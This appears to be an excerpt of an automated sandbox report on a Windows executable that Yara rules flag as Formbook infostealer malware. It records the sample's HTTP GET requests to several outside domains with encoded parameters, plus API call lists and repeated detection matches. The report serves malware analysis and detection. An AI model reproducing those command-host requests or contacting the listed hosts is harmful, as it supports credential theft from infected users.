          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=WdqFsCJDDrfJVVKQ96FU4wJF/oM38RLKT57XIM51VttjxsJHubphilqOW6BmhpvfH7LL&CJBlp=0Brh6Vr8UbBX HTTP/1.1Host: www.alsafi.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX HTTP/1.1Host: www.eco1tnpasumo3.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=vhYC9jp4QxyX9P9jU1kmIMvJN+CriLjGecmH3lCQz9Uj4oO69oLOp3ieJLqJz40Fbqlq&CJBlp=0Brh6Vr8UbBX HTTP/1.1Host: www.alhudadevelopers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=NO7HiJjWp23E/NVr6f5oxbZpLiVezzkACgfnzaC9yrbwkfp2XaPNKLC9V4BmJOtFaRlB HTTP/1.1Host: www.qgt114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=PjOGATJe62g+EVXM60l0TMrP33Vq4i5cZ7PlVlprXq2FiCzLypjhbH9eK52lYLlj7XZy&CJBlp=0Brh6Vr8UbBX HTTP/1.1Host: www.8straps.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=1VzaRmvUXe4pCORdptTlduQET280TPZEdmjA3nEATW/6bXP3pygViu3GMM/9v+eynZ6+&VDK0L=5jZhjDchE HTTP/1.1Host: www.cosmetictreat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=Wjqq3kKWaZessn6+0zor2VbG1MsxXB3N8HOi7pnP0i0lcv2FzdILsKCUGbtokKNHvSaZ&VDK0L=5jZhjDchE HTTP/1.1Host: www.brasbux.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=3boPinz1+GTktZtFPn4Wh9WVNEiaR4p62fPMr1up18b62Q31EEwhNzwdf2qpwnv2m2XV&VDK0L=5jZhjDchE HTTP/1.1Host: www.geefmijcorona.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nqn4/?T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX&VDK0L=5jZhjDchE HTTP/1.1Host: www.eco1tnpasumo3.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FF1

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 41.2.5jsdph8p9l_r.exe.e800000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MV ROCKET_PDA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 40.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.5jsdph8p9l_r.exe.e820000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 41.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.5jsdph8p9l_r.exe.e820000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 37.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 40.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.279433578.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000002.754112102.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000028.00000002.778458695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.799581711.00000000011C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.793073611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326284142.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000001.751913431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000028.00000001.775791090.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326230897.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000029.00000002.793993652.000000000E800000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.801537321.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000027.00000002.780001477.000000000E820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000001.790583041.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 41.2.5jsdph8p9l_r.exe.e800000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 41.2.5jsdph8p9l_r.exe.e800000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MV ROCKET_PDA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MV ROCKET_PDA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 42.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 42.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 40.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 40.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 39.2.5jsdph8p9l_r.exe.e820000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 39.2.5jsdph8p9l_r.exe.e820000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 41.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 41.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 38.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 38.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 39.2.5jsdph8p9l_r.exe.e820000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 39.2.5jsdph8p9l_r.exe.e820000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 42.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 42.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 38.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 38.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 42.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 42.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 37.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 37.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 40.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 40.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 38.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 38.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 42.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.279433578.000000000E7D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.279433578.000000000E7D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000026.00000002.754112102.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000026.00000002.754112102.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000028.00000002.778458695.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000028.00000002.778458695.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.799581711.00000000011C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.799581711.00000000011C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000002A.00000002.793073611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000002A.00000002.793073611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326284142.00000000009F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326284142.00000000009F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000026.00000001.751913431.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000026.00000001.751913431.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000028.00000001.775791090.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000028.00000001.775791090.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326230897.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326230897.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000029.00000002.793993652.000000000E800000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000029.00000002.793993652.000000000E800000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.801537321.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.801537321.0000000003600000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000027.00000002.780001477.000000000E820000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000027.00000002.780001477.000000000E820000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000002A.00000001.790583041.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000002A.00000001.790583041.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: MV ROCKET_PDA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 41.2.5jsdph8p9l_r.exe.e800000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 41.2.5jsdph8p9l_r.exe.e800000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MV ROCKET_PDA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MV ROCKET_PDA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 42.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 42.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 40.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 40.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 39.2.5jsdph8p9l_r.exe.e820000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 39.2.5jsdph8p9l_r.exe.e820000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 41.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 41.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 38.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 38.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 39.2.5jsdph8p9l_r.exe.e820000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 39.2.5jsdph8p9l_r.exe.e820000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 42.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 42.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 38.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 38.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
